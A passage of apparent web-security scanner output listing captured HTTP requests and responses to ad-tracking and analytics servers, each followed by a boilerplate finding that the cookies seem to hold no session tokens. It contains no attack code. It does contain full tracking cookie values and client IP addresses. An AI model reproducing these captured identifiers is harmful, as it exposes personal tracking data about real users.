6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Set-Cookie: rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Location: http://ad.yieldmanager.com/pixel?id=108869&t=2 Content-Length: 0 Date: Sun, 24 Apr 2011 03:08:42 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1 Host: ads.revsci.net Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtWbj6GKPTeto2o206rx7XdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9FXqajQPusTp1Jcs8ZjfglfknWAN/Q1IfyZw5h0t1bS95yIeZFtkPXSC2LxApOiqcQjM6vzFrEqEYTBt+vGOrPGvAgmk6EujcF1pARpPpVf1t8GJcgXgZqGCYmfomxtXdEgF5VKMZEFWBmbNUKntEp+ukrNGGBkXCmINvvD2jww0YZ7hmZNBoLNjfcex0Zl4CJC36Z4USPuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFf/+1/xUY2A6W6SqbcuheULZgHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2SFYgoO7k+RZWUd0XDMaGcg3JqM/wuDmnuWWb0A4COsclOeEQtHtMWW3/snkkNcgVm7VDJfkCm6cjOTrvlOItggKPIusbL1l9SCaB99VdIjRitqqb3WE8ef2luiUylYJxjwzBtb+QBbLiC7/pZjNWAycY5tP/aRFsAiCBupTjGYjm2g0lHMDqDrmlPMoscSYxhTTPv0KuN3m/EHY62T5Ybif1g+5CbvHd48MQZdo4gIxa2ziYKirixPgI/vnDwea4BL4iinQWN+AIncp4UYoiLCWtpcrIRtS9MgPS6DIFnjQGyv2+z+jIrmAoHMMiwl2RATjCQeV+rkFcTCsGNYksONovJdR5NKAGZWNoFpiSfZPYB1taJHpApkWWC5HQR2TSEsOPvnrTO97GqGy3v+4KyaxwMFuCLHS2kq0YgKXQMBA7NAdk77MeO9hTm31Gm0RKqWr8kM45JW+VUIho7H9Y8jWf7dAfdzDjskSOFAYILVnxSgKnS47RV57TZ72P1HE0E82c+PZVqML3+BjNrt1HwJ5CeCU3tHXiQJc2q8DAT4Eh6R5wsQQa1LW7rHc8JX9ATBuaDtmPphjkIZ8U0vbrZ9Ik58JYB0K4lccxDWK7o1rKItXy97q+0Szc2/Ipa3ZbyO1slKuyCzgqZbam9cmA=="
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_0uRB="MLsXr98vcS5joAC3camm7m2LoDlezxNylzFx7q/7jh3vp9AaQ0d9+4VlvUgGPKQSVQ0KcSykIsBNoGXZdCAjuytlySGQ8/OftgBmlbDwxFXRsomko1dhpOEfNP9MWs6AJTpJGx4KVi3NyPLg6Ty1pZmBPol2v9eYT5WRqRvcf4u7txMu41iZYICzca0HKhAQnwG5+txYSjJVizEkhHghBeBMejkXDWkFVpZFcJOam5H6TC/Tk1UQDlT2PROx4nyyaEMjdDmLFNf1MZpXO9+vMJzhD7J7mRXm6jp5YWVv1nqFetXyeSI7ZLD/HSjFMKINO4FJgacxXDy5cV+HgtmUtTj0WAtVBJbk2nr4A7CJzwfNMNhtayL1bGn7HiJkIFLdmtlcSukRVDvh+KeaKP5f8TgfTiH6y91un+b23Q=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soH0f//DC7T+Ic8+Pr1nwUVevtCuE5/4IrgrPwDhQFpkUH9FP70YBKszuOe3UntXFMcTHLwgRLgVdrk3Un+lJZ/5e0yGlLruWUfqFPMt4Ra0+I8MJVwu20bf9vn4fQdGiwg6WnLAVuwjfo+LLfaow047Iln7+U+3J6ljUNMRuOkdO+Mn/yv8Ph4raozqmp2KbF/M/a1XxqebKzuxmu8P4iJRDp1Ntv4/dIGw9D2DMN9PwOraB87GBl1xM1/boOivuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFc9G1/w0gmA6W6SqbcuheULZwHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2TFYggAzs+RZG0d0XDMaGcg3JqM/wuDWn6Wub0A/DucMtOeFRNXtMWW31c4nOqAAjGb6dEXs6cNZjpO7StgJpoDpkVKZVGLKfEh9jQ9l6nSztR6DyjuvmxCgsa46ly8aszaWZYZJmTuIQbm69sfr5mW3/PK3SvJi6DXR0PMaJsaqJ5q9fCF3PFxL8LFhHm80FFGihrqbvB3bQHHLhlk8d2VR8SeYammYKxZevEfy1KHOMBa3YpJ2lN0Opstz27gxRQgqs/InUyx+li/d9t9KwaSz3VOxH0Ri4Yywxr7Ig6qmMk9xXzakMFVw4BGQRcMBBazm2cBmuu8nKUZKWJqXd5gkwvN2O+FhcMNi6UqYZEdlhfVc9wXJMhMgKs6B4oTJPFt6VptUoFNcs35hRw4EbB8HodfVeMO1nV/ce9raL2Krjq29xAZ/HV9fbmMqTnC0kkaMMPeIJ5jGritmycpL6Y9Y5aJbbmSj7WiK4jex59VdY8bmG18R7EK55Y9XONQd8/87mj2Com+PLwweMLwYNe5Gp3WWG5eIx0v8yJwjPizFzH5yT7Gz7hpI4/A90CViAXPC38wcaxfRCbbbXW9kJ1bot+CMUBQUZbSZUiCeNUh9IFhoqHhTFLLH6caSwzmpmqVNHQI9uZrOUh8WjlexA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Location: http://ad.yieldmanager.com/pixel?id=108869&t=2 Content-Length: 0 Date: Sun, 24 Apr 2011 03:16:37 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: analytic.hotelclub.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/?t=pp&px=2853&rnd=[cachebuster] HTTP/1.1 Host: at.amgdgt.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUJOVvjFDHGBmzbDBIcekOVM7Pu2ADA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GBmAxjPqt5b8aYRoBABTNBsn
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUXD2qAp.o9VSb5yRFcRQS0cy3DIQDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GIHOABrbWnU3DqIRAFGMGuw-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 03:08:32 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Location: http://ib.adnxs.com/seg?add=93909&t=2 Content-Length: 0 Date: Sun, 24 Apr 2011 03:08:31 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1548627385 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 24 Apr 2011 12:29:52 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 12:29:52 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web84 Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/ Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/ Content-Type: image/gif Date: Sun, 24 Apr 2011 03:08:32 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1 Host: clk.atdmt.com Proxy-Connection: keep-alive Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=